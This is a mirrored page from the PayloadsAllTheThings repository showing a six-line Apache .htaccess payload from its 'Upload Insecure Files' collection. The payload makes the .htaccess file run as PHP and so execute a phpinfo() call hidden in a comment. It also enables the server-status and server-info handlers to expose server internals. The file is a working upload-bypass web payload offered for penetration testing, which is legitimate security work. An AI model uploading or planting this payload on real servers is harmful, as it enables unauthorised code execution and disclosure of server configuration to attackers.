1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-05-19 17:36:08 +02:00
PayloadsAllTheThings/Upload Insecure Files/Configuration Apache .htaccess/.htaccess_phpinfo
2020-09-27 11:16:50 +02:00

6 lines
113 B
Plaintext

AddType application/x-httpd-php .htaccess
# <?php phpinfo(); ?>
SetHandler server-status
SetHandler server-info